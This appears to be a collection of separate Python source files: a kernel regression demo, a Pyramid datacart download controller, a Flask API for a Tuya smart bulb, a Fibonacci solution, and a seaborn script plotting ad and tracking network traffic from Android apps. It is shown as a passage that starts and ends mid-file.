        K = np.exp(-pow(ker,2)/(2*pow(self.kernelParam,2)))
        return K
        #return np.exp(-(self.calcDist(x, self.x) ** 2 / (2 * self.kernelParam ** 2)))
    #------------------------------------
    #------------------------------------
    # Kernel ridge regression: least squares on the (bias-augmented) Gram
    # matrix with a small L2 penalty (ramda) for numerical stability.
    def trainMatKernel(self):
        tKer = self.kernel(self.x)
        x = np.insert(tKer,tKer.shape[0],1,axis=0)
        ramda = 0.01
        i = np.eye(x.shape[0])
        l = np.linalg.inv(np.dot(x,x.T)+ramda*i)
        r = np.dot(x,self.y.T)
        self.w = np.dot(l,r)
        #self.w = np.zeros([self.xDim,1])
    #------------------------------------
# クラスの定義終わり
#-------------------
#-------------------
# メインの始まり
if __name__ == "__main__":
    #------------------------------------
    # Linear model, 1-D data
    # 1) Generate artificial training/test data (1-D input)
    myData = rg.artificial(200,100, dataType="1D")
    #myData = rg.artificial(200,100, dataType="1D",isNonlinear=True)
    # 2) Linear regression model
    regression = linearRegression(myData.xTrain,myData.yTrain)
    #regression = linearRegression(myData.xTrain,myData.yTrain,kernelType="gaussian",kernelParam=1)
    # 3) Training (for-loop version)
    sTime = time.time()
    regression.train()
    eTime = time.time()
    print("train with for-loop: time={0:.4} sec".format(eTime-sTime))
    # 4) Training (matrix version)
    sTime = time.time()
    regression.trainMat()
    eTime = time.time()
    print("train with matrix : time={0:.4} sec".format(eTime-sTime))
    # 5) Evaluate the trained model on the test data
    print("loss={0:.3}".format(regression.loss(myData.xTest,myData.yTest)))
    # 6) Plot training/evaluation data and the predictions
    predict = regression.predict(myData.xTest)
    #myData.plot(predict,isTrainPlot=False)
    myData.plot(predict)
    #------------------------------------
    # Linear model, 2-D data
    # 1) Generate artificial training/test data (2-D input)
    myData = rg.artificial(200,100, dataType="2D")
    #myData = rg.artificial(200,100, dataType="2D",isNonlinear=True)
    # 2) Linear regression model
    regression = linearRegression(myData.xTrain,myData.yTrain)
    #regression = linearRegression(myData.xTrain,myData.yTrain,kernelType="gaussian",kernelParam=1)
    # 4) Training (matrix version)
    sTime = time.time()
    regression.trainMat()
    eTime = time.time()
    print("train with matrix : time={0:.4} sec".format(eTime-sTime))
    # 5) Evaluate the trained model on the test data
    print("loss={0:.3}".format(regression.loss(myData.xTest,myData.yTest)))
    # 6) Plot training/evaluation data and the predictions
    predict = regression.predict(myData.xTest)
    #myData.plot(predict,isTrainPlot=False)
    myData.plot(predict)
    #------------------------------------
    # Gaussian kernel model, bandwidth 1
    # 1) Generate nonlinear 1-D data
    myData = rg.artificial(200,100, dataType="1D",isNonlinear=True)
    # 2) Kernel regression model
    regression = linearRegression(myData.xTrain,myData.yTrain,kernelType="gaussian",kernelParam=1)
    # 4) Training
    regression.trainMatKernel()
    # 5) Evaluate on the kernel-mapped test data
    print("loss={0:.3}".format(regression.loss(regression.kernel(myData.xTest),myData.yTest)))
    # 6) Plot the predictions
    predict = regression.predict(regression.kernel(myData.xTest))
    myData.plot(predict,isTrainPlot=False)
    #------------------------------------
    # Gaussian kernel model, bandwidth 0.1
    # 1) Generate nonlinear 1-D data
    myData = rg.artificial(200,100, dataType="1D",isNonlinear=True)
    # 2) Kernel regression model
    regression = linearRegression(myData.xTrain,myData.yTrain,kernelType="gaussian",kernelParam=0.1)
    # 4) Training
    regression.trainMatKernel()
    # 5) Evaluate on the kernel-mapped test data
    print("loss={0:.3}".format(regression.loss(regression.kernel(myData.xTest),myData.yTest)))
    # 6) Plot the predictions
    predict = regression.predict(regression.kernel(myData.xTest))
    myData.plot(predict,isTrainPlot=False)
    #------------------------------------
    # Gaussian kernel model, bandwidth 5
    # 1) Generate nonlinear 1-D data
    myData = rg.artificial(200,100, dataType="1D",isNonlinear=True)
    # 2) Kernel regression model
    regression = linearRegression(myData.xTrain,myData.yTrain,kernelType="gaussian",kernelParam=5)
    # 4) Training
    regression.trainMatKernel()
    # 5) Evaluate on the kernel-mapped test data
    print("loss={0:.3}".format(regression.loss(regression.kernel(myData.xTest),myData.yTest)))
    # 6) Plot the predictions
    predict = regression.predict(regression.kernel(myData.xTest))
    myData.plot(predict,isTrainPlot=False)
    # End of main
    #-------------------
|
"""Datacart controller.
"""
from datetime import datetime
from copy import copy
from StringIO import StringIO
from zipfile import ZipFile, ZIP_DEFLATED
from logging import getLogger
from traceback import format_exc
log = getLogger(__name__)
from pyramid.response import Response
from pyramid.renderers import render_to_response
from pyramid.httpexceptions import (
HTTPBadRequest, HTTPMethodNotAllowed, HTTPNotFound, HTTPSeeOther)
from webhelpers.text import plural
from tempfilezipstream import (
TempFileStreamingZipFile, FileWrapper, ZIP_DEFLATED)
from pycchdo.views import *
from pycchdo.models.datacart import Datacart
from pycchdo.models.serial import store_context, Change, Cruise
# Maximum number of files the UI offers for a single zip download.
ZIP_FILE_LIMIT = 20
# Filename template for generated zip archives ({0} = ISO-style timestamp).
TEMPNAME = 'cchdo_datacart_{0}.zip'
def get_datacart(request):
    """Return the session's datacart, creating and storing one on demand."""
    if 'datacart' not in request.session:
        request.session['datacart'] = Datacart()
    return request.session['datacart']
def _redirect_back_or_default(request):
    """303-redirect to the referring page, falling back to the datacart index."""
    location = request.referrer or request.route_path('datacart')
    return HTTPSeeOther(location=location)
def _json_response(obj):
    """Render obj through the 'json' renderer with a JSON content type."""
    response = render_to_response('json', obj)
    response.content_type = 'application/json'
    return response
def index(request):
    """Datacart landing page; exposes the zip download limit to the template."""
    return {'ZIP_FILE_LIMIT': ZIP_FILE_LIMIT}
def add(request):
    """Add a single file (Change id in request param 'id') to the datacart.

    XHR requests get a JSON cart count; otherwise a flash message is set and
    the user is redirected back. Raises HTTPNotFound for a missing or
    unknown id.
    """
    try:
        id = request.params['id']
    except (KeyError, ValueError):
        raise HTTPNotFound()
    dattr = Change.query().get(id)
    if not dattr:
        request.session.flash('Error adding file to data cart.', 'error')
        raise HTTPNotFound()
    request.datacart.add(dattr.id)
    if request.is_xhr:
        return _json_response({'cart_count': len(request.datacart)})
    else:
        request.session.flash(
            'Added {0} to data cart'.format(dattr.value.name), 'success')
        return _redirect_back_or_default(request)
def remove(request):
    """Remove a single file (Change id in request param 'id') from the cart.

    Mirrors add(): JSON count for XHR, flash + redirect otherwise;
    HTTPNotFound for a missing or unknown id.
    """
    try:
        id = request.params['id']
    except (KeyError, ValueError):
        raise HTTPNotFound()
    dattr = Change.query().get(id)
    if not dattr:
        request.session.flash('Error removing file from data cart.', 'error')
        raise HTTPNotFound()
    request.datacart.remove(dattr.id)
    if request.is_xhr:
        return _json_response({'cart_count': len(request.datacart)})
    else:
        request.session.flash(
            'Removed {0} from data cart'.format(dattr.value.name), 'success')
        return _redirect_back_or_default(request)
def add_cruise(request):
    """Add all allowed files of one cruise (request param 'id') to the cart.

    XHR gets JSON {cart_count, diff}; otherwise the flash message reports how
    many files were added and how many were already present.
    """
    try:
        cruise_id = request.params['id']
    except KeyError:
        raise HTTPNotFound()
    file_count, count_diff = _add_single_cruise(request, cruise_id)
    if request.is_xhr:
        return _json_response(
            {'cart_count': len(request.datacart), 'diff': count_diff})
    else:
        message = "Added {0} to data cart".format(
            plural(count_diff, 'file', 'files'))
        # Files considered but not newly added were already in the cart.
        present_count = file_count - count_diff
        if present_count > 0:
            message += " ({0} already present).".format(present_count)
        else:
            message += "."
        request.session.flash(message, 'notice')
        return _redirect_back_or_default(request)
def remove_cruise(request):
    """Remove all allowed files of one cruise (request param 'id') from the
    cart. Mirrors add_cruise(): JSON for XHR, flash + redirect otherwise."""
    try:
        cruise_id = request.params['id']
    except KeyError:
        raise HTTPNotFound()
    file_count, count_diff = _remove_single_cruise(request, cruise_id)
    if request.is_xhr:
        return _json_response(
            {'cart_count': len(request.datacart), 'diff': count_diff})
    else:
        message = "Removed {0} from data cart".format(
            plural(count_diff, 'file', 'files'))
        # Files considered but not actually removed were not in the cart.
        present_count = file_count - count_diff
        if present_count > 0:
            message += " ({0} not present).".format(present_count)
        else:
            message += "."
        request.session.flash(message, 'notice')
        return _redirect_back_or_default(request)
def add_cruises(request):
    """Add the datasets of several cruises (request param 'ids') to the cart.

    Unknown cruise ids are skipped rather than aborting the batch. XHR gets
    JSON {cart_count, diff}; otherwise a summary flash message is set.
    """
    try:
        cruise_ids = request.params.getall('ids')
    except KeyError:
        raise HTTPNotFound()
    log.debug(cruise_ids)
    file_count_all = 0
    count_diff_all = 0
    for id in cruise_ids:
        try:
            file_count, count_diff = _add_single_cruise(request, id)
        except HTTPNotFound:
            file_count = 0
            count_diff = 0
        file_count_all += file_count
        count_diff_all += count_diff
    if request.is_xhr:
        # BUG FIX: the XHR response used to report only the last iteration's
        # count_diff (and raised NameError for an empty id list); report the
        # aggregated total instead.
        return _json_response(
            {'cart_count': len(request.datacart), 'diff': count_diff_all})
    else:
        message = "Added {0} to datacart".format(
            plural(count_diff_all, 'file', 'files'))
        # Files considered but not newly added were already in the cart.
        present_count = file_count_all - count_diff_all
        if present_count > 0:
            message += " ({0} already present).".format(present_count)
        else:
            message += "."
        request.session.flash(message, 'success')
        return _redirect_back_or_default(request)
def remove_cruises(request):
    """Remove the datasets of several cruises (request param 'ids') from the
    cart. Unknown cruise ids are skipped; mirrors add_cruises()."""
    try:
        cruise_ids = request.params.getall('ids')
    except KeyError:
        raise HTTPNotFound()
    file_count_all = 0
    count_diff_all = 0
    for id in cruise_ids:
        try:
            file_count, count_diff = _remove_single_cruise(request, id)
        except HTTPNotFound:
            file_count = 0
            count_diff = 0
        file_count_all += file_count
        count_diff_all += count_diff
    if request.is_xhr:
        # BUG FIX: the XHR response used to report only the last iteration's
        # count_diff (and raised NameError for an empty id list); report the
        # aggregated total instead.
        return _json_response(
            {'cart_count': len(request.datacart), 'diff': count_diff_all})
    else:
        message = "Removed {0} from datacart".format(
            plural(count_diff_all, 'file', 'files'))
        # Files considered but not actually removed were not in the cart.
        present_count = file_count_all - count_diff_all
        if present_count > 0:
            message += " ({0} not present).".format(present_count)
        else:
            message += "."
        request.session.flash(message, 'success')
        return _redirect_back_or_default(request)
def clear(request):
    """Empty the datacart (POST only) by dropping it from the session."""
    method = http_method(request)
    if method != 'POST':
        raise HTTPMethodNotAllowed()
    try:
        del request.session['datacart']
    except KeyError:
        # Already empty/absent; clearing is idempotent.
        pass
    if request.is_xhr:
        return _json_response({'cart_count': 0})
    else:
        request.session.flash('Cleared data cart', 'success')
        return _redirect_back_or_default(request)
def _add_single_cruise(request, cruise_id):
    """Add every allowed file of cruise `cruise_id` to the datacart.

    Returns (file_count, count_diff): files considered vs newly added.
    Raises HTTPNotFound when the id is invalid or matches no cruise.
    """
    try:
        cruise_obj = Cruise.query().get(cruise_id)
        if cruise_obj is None:
            raise ValueError()
    except ValueError:
        request.session.flash(
            'Error adding cruise {0} dataset from data cart'.format(
                cruise_id), 'error')
        raise HTTPNotFound()
    before_count = len(request.datacart)
    mapped_files = cruise_obj.file_attrs
    file_count = 0
    for ftype, fattr in mapped_files.items():
        # Skip file types the datacart does not accept.
        if not Datacart.is_file_type_allowed(ftype):
            continue
        request.datacart.add(fattr.id)
        file_count += 1
    after_count = len(request.datacart)
    # The size delta counts only files that were not already in the cart
    # (the datacart is presumably set-like — see Datacart).
    count_diff = after_count - before_count
    return (file_count, count_diff)
def _remove_single_cruise(request, cruise_id):
    """Remove every allowed file of cruise `cruise_id` from the datacart.

    Returns (file_count, count_diff): files considered vs actually removed.
    Raises HTTPNotFound when the id is invalid or matches no cruise.
    """
    try:
        cruise_obj = Cruise.query().get(cruise_id)
        # BUG FIX: mirror _add_single_cruise — a missing cruise used to fall
        # through as None and crash below with AttributeError instead of
        # producing the 404 the callers (remove_cruise/remove_cruises) expect.
        if cruise_obj is None:
            raise ValueError()
    except ValueError:
        request.session.flash(
            'Error removing cruise dataset from data cart', 'error')
        raise HTTPNotFound()
    before_count = len(request.datacart)
    mapped_files = cruise_obj.file_attrs
    file_count = 0
    for ftype, fattr in mapped_files.items():
        # Skip file types the datacart does not accept.
        if not Datacart.is_file_type_allowed(ftype):
            continue
        try:
            request.datacart.remove(fattr.id)
        except KeyError:
            # File was not in the cart; removal stays best-effort.
            pass
        file_count += 1
    after_count = len(request.datacart)
    count_diff = before_count - after_count
    return (file_count, count_diff)
class ChangeFileWrapper(FileWrapper):
    """FileWrapper that lazily opens a Change's stored file, substituting a
    placeholder stream when the underlying file cannot be opened."""
    # Placeholder content served when the real file is missing.
    # NOTE(review): copy() below is shallow; whether concurrent downloads can
    # interfere via a shared buffer/read position should be confirmed.
    EMPTY_FILE = StringIO('missing, contact the CCHDO')
    def __init__(self, arcname, fileobj):
        super(ChangeFileWrapper, self).__init__(arcname, fileobj)
        # Cache of the opened file; None until the property is first read.
        self._fobj = None
    @property
    def fobj(self):
        """The opened file object, opened on first access.

        Falls back to a copy of EMPTY_FILE (and logs) if opening fails;
        other errors are logged and leave the cache unset.
        """
        if self._fobj is None:
            try:
                # __fobj (name-mangled) holds the raw value set via the setter.
                self._fobj = self.__fobj.open_file()
            except (OSError, IOError) as err:
                self._fobj = copy(self.EMPTY_FILE)
                log.error(u'Missing file {0} {1!r}'.format(self.__fobj, err))
            except Exception as error:
                log.error(repr(error))
        return self._fobj
    @fobj.setter
    def fobj(self, value):
        self.__fobj = value
        # Invalidate the cached open file on reassignment.
        self._fobj = None
    @fobj.deleter
    def fobj(self):
        del self.__fobj
        self._fobj = None
    def __repr__(self):
        return u'ChangeFileWrapper({0}, {1!r})'.format(self.arcname, self.fobj)
def download(request):
    """Stream a zip archive of the Change files named in POST param
    'archive' (a comma-separated list of integer ids).

    Raises HTTPMethodNotAllowed for non-POST and HTTPBadRequest for a
    missing or malformed id list.
    """
    method = http_method(request)
    if method != 'POST':
        raise HTTPMethodNotAllowed()
    try:
        archive = request.params['archive']
    except KeyError:
        raise HTTPBadRequest()
    try:
        # Python 2: map() yields a list of ints here.
        ids = map(int, archive.split(','))
    except (AttributeError, ValueError):
        raise HTTPBadRequest()
    def app_iter():
        # Generator yielding zip chunks. Failures are logged and swallowed
        # (not raised) because response headers may already have been sent.
        try:
            attrs = Change.get_all_by_ids(*ids)
            zstream = TempFileStreamingZipFile([])
            for attr in attrs:
                dfile = attr.value
                zstream.write(ChangeFileWrapper(dfile.name, dfile),
                    compress_type=ZIP_DEFLATED)
        except Exception as exc:
            log.error(u'Unable to bulk download {0} {1}'.format(
                format_exc(exc), ids))
            return
        else:
            # Keep the file store open while chunks are being streamed.
            with store_context(request.fsstore):
                for chunk in iter(zstream):
                    yield chunk
    fname = TEMPNAME.format(datetime.now().strftime('%FT%T'))
    return Response(
        app_iter=app_iter(),
        content_type='application/zip',
        content_disposition='attachment; filename={0}'.format(fname))
|
import json
from flask_restful import Resource
from tinytuya import BulbDevice
from utils import clamp_color, clamp_value, get_tuya_power_status
class Lamp:
    """Thin wrapper around a tinytuya BulbDevice, configured from
    data/lamp.json (expects keys: device_id, ip, local_key)."""
    def __init__(self):
        with open("data/lamp.json") as f:
            tuya_data = json.load(f)
        self.bulb = BulbDevice(tuya_data["device_id"], tuya_data["ip"], tuya_data["local_key"])
        # Local Tuya protocol version spoken by this device.
        self.bulb.set_version(3.3)
    def get_status(self):
        """Return the bulb's power, brightness percentage and RGB colour.

        White mode reports (255, 255, 255). NOTE(review): assumes
        state["brightness"] is on a 0-255 scale — confirm with tinytuya.
        """
        state = self.bulb.state()
        r, g, b = self.bulb.colour_rgb() if state["mode"] == "colour" else (255, 255, 255)
        return {
            "power": "on" if state["is_on"] else "off",
            "brightness": int((state["brightness"] / 255) * 100),
            "color": {
                "red": r, "green": g, "blue": b
            }
        }
    def set_power(self, status:str):
        """Switch the lamp "on"/"off"; any other status toggles it."""
        if status == "on":
            self.bulb.turn_on()
        elif status == "off":
            self.bulb.turn_off()
        else:
            # Unrecognised status: flip the current power state.
            if get_tuya_power_status(self.bulb, 1) == "on":
                self.bulb.turn_off()
            else:
                self.bulb.turn_on()
            return { "message": "Lamp toggled." }
        return { "message": f"Lamp turned {status}." }
    def set_color(self, red:int, green:int, blue:int):
        """Set the bulb colour; pure white switches to colour-temperature
        mode instead. Components pass through clamp_color first."""
        red, green, blue = clamp_color(red, green, blue)
        if red == 255 and green == 255 and blue == 255:
            self.bulb.set_colourtemp(128)
        else:
            self.bulb.set_colour(red, green, blue)
        # Make the change visible immediately if the lamp was off.
        if get_tuya_power_status(self.bulb, 1) == "off":
            self.bulb.turn_on()
        return { "message": f"Lamp color set to ({red}, {green}, {blue})." }
    def set_brightness(self, brightness:int):
        """Set brightness (clamped to 0-100%); only effective while the bulb
        reports white mode (dps "2" == "white"). Ensures the lamp is on."""
        if self.bulb.status()["dps"]["2"] == "white":
            self.bulb.set_brightness_percentage(clamp_value(brightness, 0, 100))
            message = f"Lamp brightness set to {brightness}%."
        else:
            message = "Setting lamp brightness is only possible in white mode."
        if get_tuya_power_status(self.bulb, 1) == "off":
            self.bulb.turn_on()
        return { "message": message }
class LampStatus(Resource):
    """REST endpoint returning the lamp's current status."""
    def get(self):
        return Lamp().get_status()
class LampPower(Resource):
    """REST endpoint switching lamp power ("on"/"off"/anything = toggle)."""
    def get(self, status:str):
        return Lamp().set_power(status)
class LampColor(Resource):
    """REST endpoint setting the lamp's RGB colour."""
    def get(self, red:int, green:int, blue:int):
        return Lamp().set_color(red, green, blue)
class LampBrightness(Resource):
    """REST endpoint setting the lamp's brightness percentage."""
    def get(self, brightness:int):
        return Lamp().set_brightness(brightness)
|
class Solution(object):
    """Iterative Fibonacci computations (fib(0)=0, fib(1)=1)."""

    def fib(self, n):
        """Return the n-th Fibonacci number.

        :type n: int
        :rtype: int
        """
        if n < 2:
            return n
        a, b = 0, 1
        for _ in range(2, n + 1):
            a, b = b, a + b
        return b

    def fib_mod(self, n):
        """Return fib(n) modulo 1000000007 (for problems that require the
        modular answer to avoid big integers).

        BUG FIX: the class previously defined two methods both named ``fib``;
        the second silently shadowed the first, making the modular version
        dead code. It is now exposed under its own name, preserving the
        existing behavior of ``fib`` for current callers.

        :type n: int
        :rtype: int
        """
        if n < 2:
            return n
        a, b = 0, 1
        for _ in range(2, n + 1):
            a, b = b, a + b
        return b % 1000000007
if __name__ == "__main__":
    # Print the first nine Fibonacci numbers as a quick sanity check.
    solver = Solution()
    for n in range(9):
        print('fib %d: %d' % (n, solver.fib(n)))
|
import pandas as p
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import time
import datetime
import math
from matplotlib import rcParams
rcParams.update({'figure.autolayout': True})
# Silence pandas' SettingWithCopyWarning for the column assignments below.
p.options.mode.chained_assignment = None
# LAN addresses of the capture phones; traffic to/from these is local, so a
# packet's "remote" endpoint is whichever side is not one of these.
phone_ip = "192.168.137.186"
phone_ip2 = "192.168.137.46"
phone_ip3 = "192.168.137.21"
# Global seaborn/matplotlib styling shared by every figure.
sns.set_style("darkgrid")
sns.set_context('talk')
sns.set_palette("Set1")
ALPHA = 0.7  # line transparency used in all time-series plots
title_font = {'fontname': 'Arial', 'size': '20', 'color': 'black', 'weight': 'normal',
              'verticalalignment': 'bottom'}  # Bottom vertical alignment for more space
axis_font = {'fontname': 'Arial', 'size': '16', 'color': 'black', 'weight': 'normal'}  # Bottom vertical alignment for more space
label_font = {'fontname': 'Arial', 'size': '12', 'color': 'black', 'weight': 'normal'}
# Android package names of the analysed applications.
all_apps = ["com.tubitv", "com.wayfair.wayfair", "io.voodoo.crowdcity", "com.sausageflip.game", "com.pinterest"]
# all_apps = ["io.voodoo.crowdcity"]
# Apps with no plain-HTTP traffic (skip HTTP-sheet graphs for these).
no_http = ["com.sausageflip.game"]
############################################
# HELPER STUFF #
############################################
def distribute_time(all_dfs):
    """Reindex every dataframe in all_dfs onto a shared, gap-free minute grid.

    The grid of 'HH:MM' strings spans the earliest to the latest Time seen
    across all frames; minutes without an observation become NaN rows.
    Returns the list of reindexed dataframes in the same order.
    """
    # Gather every distinct Time value across all frames, sorted.
    seen = []
    for frame in all_dfs:
        seen += list(frame["Time"])
    seen = sorted(list(dict.fromkeys(seen)))
    # One entry per minute between the first and last observation.
    minute = p.to_datetime(min(seen))
    last = p.to_datetime(max(seen))
    minutes = []
    while minute <= last:
        minutes.append(minute.strftime("%H:%M"))
        minute = minute + p.Timedelta(minutes=1)
    grid = p.DataFrame({'Time': minutes})
    filled = []
    for frame in all_dfs:
        merged = p.concat([grid, frame], join="outer", sort=False)
        # Where a minute has a real observation, keep it over the grid row.
        merged.drop_duplicates(subset=['Time'], keep='last', inplace=True)
        merged.sort_values(by=['Time'], inplace=True)
        merged = merged.reset_index().drop('index', axis=1)
        filled.append(merged)
    return filled
def get_all_dfs(dataset, column):
    """Split a (service, Time)-MultiIndexed dataframe into one frame per
    known service type, renaming `column` to a display label.

    Frames are returned in fixed plotting order — Benign, Advertisements,
    Tracking, Both — skipping service types absent from the data.

    REFACTOR: the four copy-pasted if-blocks were collapsed into a single
    data-driven loop; the selection order and output are unchanged.
    """
    service_types = list(dataset[column].index.levels[0])
    # (raw service key in the index, display column label) in plotting order.
    labels = [
        ('benign', 'Benign'),
        ('ad', 'Advertisements'),
        ('telemetry', 'Tracking'),
        ('ad,tracking', 'Both'),
    ]
    all_dfs = []
    for service, label in labels:
        if service in service_types:
            frame = dataset[column][service].reset_index().rename(
                columns={column: label})
            all_dfs.append(frame)
    return all_dfs
def colour_lines(all_dfs):
    """Return one palette colour per dataframe, keyed by its value-column
    label so each service class is always drawn in the same colour."""
    palette = sns.color_palette()
    colour_for = {
        "Benign": palette[2],
        "Advertisements": palette[0],
        "Tracking": palette[1],
    }
    colours = []
    for frame in all_dfs:
        label = frame.columns[1]
        # Any other label ("Both", etc.) falls back to the fourth colour.
        colours.append(colour_for.get(label, palette[3]))
    return colours
def clean_package_name(package_name):
    """Shorten an APK package/file name to its distinctive middle part(s).

    'com.foo.apk...' -> 'foo'; 'com.foo.bar...' -> 'foo.bar'.
    Returns '' for NaN/None input and, as a robustness fix, returns names
    with fewer than three dot-separated parts unchanged (the original
    raised IndexError on those).
    """
    if p.isnull(package_name):
        return ""
    parts = package_name.split('.')
    if len(parts) < 3:
        return package_name
    if parts[2] == 'apk':
        return parts[1]
    return parts[1] + "." + parts[2]
def get_graph_name(sheet, app_name, graph_name):
    """Build the output path for a saved graph under ./graphs/v3/.

    Dots in the app name become dashes; a non-empty sheet name is appended
    in parentheses before the .png extension.
    """
    safe_app = app_name.replace('.', '-')
    if sheet != "":
        suffix = "_" + graph_name + "(" + sheet + ").png"
    else:
        suffix = "_" + graph_name + ".png"
    return "./graphs/v3/" + safe_app + suffix
############################################
# HTTPS STUFF #
############################################
def ips_over_time(path, sheet, app_name):
    """Plot unique remote-IP connections per minute, per service class, for
    one sheet ('HTTP'/'HTTPS') of an app's capture workbook; saves a PNG."""
    df = p.read_excel(path, index_col=None, sheet_name=sheet)
    df['timestamp'] = p.to_datetime(df['timestamp'], unit='s')
    df['Time'] = df["timestamp"].dt.strftime("%H:%M")
    # The remote endpoint is whichever of src/dst is not one of the phones.
    destination = df[(df['dst ip'] != phone_ip) & (df['dst ip'] != phone_ip2) & (df['dst ip'] != phone_ip3)]['dst ip']
    source = df[(df['src ip'] != phone_ip) & (df['src ip'] != phone_ip2) & (df['src ip'] != phone_ip3)]['src ip']
    both = (destination.append(source)).to_frame()
    both.sort_index(inplace=True)
    df.drop(['src ip', 'dst ip'], axis=1, inplace=True)
    # print(both)
    df['src/dst'] = both
    # Count distinct remote IPs per (service class, minute).
    df = (df.groupby(['service', 'Time'])['src/dst'].nunique()).to_frame()
    def create_graph(dataset, column):
        # One line per service class, aligned on a shared minute grid.
        fig, ax = plt.subplots(figsize=(11, 7))
        service_types = list(dataset[column].index.levels[0])
        all_dfs = get_all_dfs(dataset, column)
        cleaned = distribute_time(all_dfs)
        colours = colour_lines(cleaned)
        i = 0
        for frame in cleaned:
            type = frame[frame.columns[1]].name
            ax.plot(frame['Time'], frame[type], '-o', alpha=ALPHA, color=colours[i])
            i += 1
        # Relabel ticks as minutes since capture start (presumably ~15-minute
        # captures, hence 16 labels — TODO confirm).
        ax.set_xticklabels(range(0, 16))
        plt.title("Total Number of Unique IP Connections over " +
                  sheet)
        plt.xlabel("Time (in minutes)")
        plt.ylabel("Total Number of Unique IP Connections")
        ax.yaxis.set_major_formatter(plt.FormatStrFormatter('%d'))
        plt.legend(fontsize=12)
    create_graph(df, "src/dst")
    # plt.show()
    plt.savefig(get_graph_name(sheet, app_name, "unique_ip_responses"))
    # get_graph_name(sheet, app_name, graph_name)
def frames_over_time(path, sheet, app_name):
    """Plot total bytes ('frame size') per minute, per service class, for
    one sheet of an app's capture workbook; saves the figure as a PNG."""
    df = p.read_excel(path, index_col=None, sheet_name = sheet)
    df['timestamp'] = p.to_datetime(df['timestamp'], unit='s')
    df['Time'] = df["timestamp"].dt.strftime("%H:%M")
    def create_graph(dataset):
        # Sum bytes per (service class, minute); one line per service class.
        column = 'frame size'
        dataset = dataset.groupby(['service', 'Time'])[column].sum()
        dataset = dataset.to_frame()
        fig, ax = plt.subplots(figsize=(11, 7))
        all_dfs = get_all_dfs(dataset, column)
        cleaned = distribute_time(all_dfs)
        colours = colour_lines(cleaned)
        i = 0
        for frame in cleaned:
            type = frame[frame.columns[1]].name
            ax.plot(frame['Time'], frame[type], '-o', alpha=ALPHA, color=colours[i])
            i += 1
        # Relabel ticks as minutes since capture start (TODO confirm 15-min runs).
        ax.set_xticklabels(range(0,16))
        plt.title("Total Traffic Sent over " + sheet)
        plt.xlabel("Time (in minutes)")
        plt.ylabel("Total Traffic Sent (in bytes)")
        ax.yaxis.set_major_formatter(plt.FormatStrFormatter('%d'))
        plt.legend(fontsize=12)
    create_graph(df)
    # plt.savefig("./graphs/v3/" + sheet + "_traffic_(" + app_name + ").png")
    plt.savefig(get_graph_name(sheet, app_name, "traffic"))
############################################
# HTTP STUFF #
############################################
def domains_over_time(path, sheet, app_name):
    """Plot unique domain connections per minute, per service class, for one
    sheet of an app's capture workbook; saves the figure as a PNG."""
    df = p.read_excel(path, index_col=None, sheet_name=sheet)
    df['timestamp'] = p.to_datetime(df['timestamp'], unit='s')
    df['Time'] = df["timestamp"].dt.strftime("%H:%M")
    def create_graph(dataset):
        # Count distinct domains per (service class, minute).
        dataset = dataset.groupby(['service', 'Time'])['domain'].nunique()
        dataset = dataset.to_frame()
        column = 'domain'
        fig, ax = plt.subplots(figsize=(11, 7))
        service_types = list(dataset[column].index.levels[0])
        all_dfs = get_all_dfs(dataset, column)
        cleaned = distribute_time(all_dfs)
        colours = colour_lines(cleaned)
        i = 0
        for frame in cleaned:
            type = frame[frame.columns[1]].name
            ax.plot(frame['Time'], frame[type], '-o', alpha=ALPHA, color=colours[i])
            i += 1
        # Relabel ticks as minutes since capture start.
        ax.set_xticklabels(range(0, 16))
        plt.title("Total Domain Connections over " + sheet)
        plt.xlabel("Time (in minutes)")
        plt.ylabel("Total Domains Connections")
        ax.yaxis.set_major_formatter(plt.FormatStrFormatter('%d'))
        plt.legend(fontsize=12)
    create_graph(df)
    # plt.savefig("./graphs/v3/" + sheet + "_domain_number_(" + app_name + ").png")
    plt.savefig(get_graph_name(sheet, app_name, "domain_number"))
def https_vs_http(path, app_name):
    """Plot per-minute HTTP vs HTTPS traffic volume on twin y-axes and save
    the combined figure as a PNG."""
    http = p.read_excel(path, index_col=None, sheet_name='HTTP')
    https = p.read_excel(path, index_col=None, sheet_name='HTTPS')
    http['timestamp'] = p.to_datetime(http['timestamp'], unit='s')
    https['timestamp'] = p.to_datetime(https['timestamp'], unit='s')
    http['Time'] = http["timestamp"].dt.strftime("%H:%M")
    https['Time'] = https["timestamp"].dt.strftime("%H:%M")
    # Total bytes per minute for each protocol.
    http = http.groupby(['Time'])['frame size'].sum().to_frame().reset_index()
    https = https.groupby(['Time'])['frame size'].sum().to_frame().reset_index()
    http.columns = ['Time', 'HTTP Frame Size']
    https.columns = ['Time', 'HTTPS Frame Size']
    # Align both series on a common, gap-free minute grid before merging.
    http, https = distribute_time([http, https])
    both = http.merge(https)
    fig, ax = plt.subplots(figsize=(11, 7))
    # HTTPS gets a secondary right-hand axis so both scales stay readable.
    both.plot(ax=ax, secondary_y=['HTTPS Frame Size'], style='-o', alpha=ALPHA)
    plt.title("HTTP Traffic VS HTTPS Traffic over Time")
    ax.set_xlabel("Time (in minutes)")
    ax.set_ylabel('Total Traffic over HTTP (in bytes)')
    ax.right_ax.set_ylabel('Total Traffic over HTTPS (in bytes)')
    ax.yaxis.set_major_formatter(plt.FormatStrFormatter('%d'))
    ax.right_ax.yaxis.set_major_formatter(plt.FormatStrFormatter('%d'))
    ax.set_xticklabels(range(0, 16))
    ax.set_xticks(range(0, 16))
    # Merge the legends from both axes into a single box.
    lines = ax.get_lines() + ax.right_ax.get_lines()
    ax.legend(lines, [l.get_label() for l in lines], loc='upper right', fontsize=12)
    # plt.savefig("./graphs/v3/http_vs_https_(" + app_name + ").png")
    plt.savefig(get_graph_name("", app_name, "http_vs_https"))
    # plt.show()
def benign_domains(path, app_name):
    """Print the HTTPS rows classified 'benign' that carry a domain name."""
    frame = p.read_excel(path, index_col=None, sheet_name='HTTPS')
    benign_rows = frame[frame['service'] == 'benign']
    benign_rows = benign_rows[benign_rows.domain.notnull()]
    print(benign_rows)
############################################
# EITHER STUFF #
############################################
def get_all_domains(path, app_name):
    """Print (as LaTeX) the ten most frequently contacted domains across the
    HTTP and HTTPS sheets, together with their service classification."""
    from collections import Counter  # stdlib; replaces the hand-rolled tally

    df = p.read_excel(path, index_col=None, sheet_name='HTTP')
    df2 = p.read_excel(path, index_col=None, sheet_name='HTTPS')
    all_domains = list(df['domain'].dropna()) + list(df2['domain'].dropna())
    # One (domain, service) classification row per distinct pair.
    domain_class1 = df[['domain', 'service']]
